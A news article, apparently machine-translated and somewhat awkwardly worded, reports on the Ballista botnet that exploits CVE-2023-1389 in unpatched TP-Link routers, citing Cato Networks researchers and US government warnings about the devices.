Researchers from the Cybersecurity Company Cato Networks, have discovered that a series of TP-Link routers with non-patching vulnerabilities are being attacked to develop a New Bots Network known as Ballista.
The computer pirate behind the malware, who believes that it has its base in Italy, has been exploiting a firmware vulnerability identified as CVE-2023-1389 to allow botnet “It automatically spreads online” through the TP-Link devices without patching.
The American infrastructure and cybersecurity security agency previously confirmed that CVE-2023-1389 was actively exploited and ordered the rest of civil agencies to correct the error. Vulnerability and patch documentation indicate a specific TP-Link model, known as AX21 or AX1800.
Offek Vardi, Cato Security Engineer Networks, said researchers are moderately sure that the hacker is based in Italy due to the location of the IP address of the command and control server (C2) and due to the chains in Italian language found within the malware code: «We believe we detect this campaign in its early stages. We saw its evolution, since, in a short time, the threat actor modified the initial dropper to allow more stealthy connections to the C2 server through the Tor network ».
In this particular campaign, malware allows the attacker to execute arbitrary commands on committed devices. This suggests that the author of the malware could have more ambitious plans than a conds of conventional payment ddos. Vardi pointed out that malware was written so that it allowed add new capabilities to future variants.
The TP-Link routers are in the spotlight
In recent months, US officials have given the alarm on TP-Link routors, because they are being repeatedly exploited by Chinese computer pirates who have used them to violate security of telecommunications giants and critical infrastructure.
For years, computer pirates They have abused the critical vulnerabilities of the TP-Link routers To use them as coverage for subsequent attacks or add them to powerful botnets that interrupt websites with false traffic. He Wall Street Journal He reported in December that US agencies were considering prohibiting TP-Link devices.
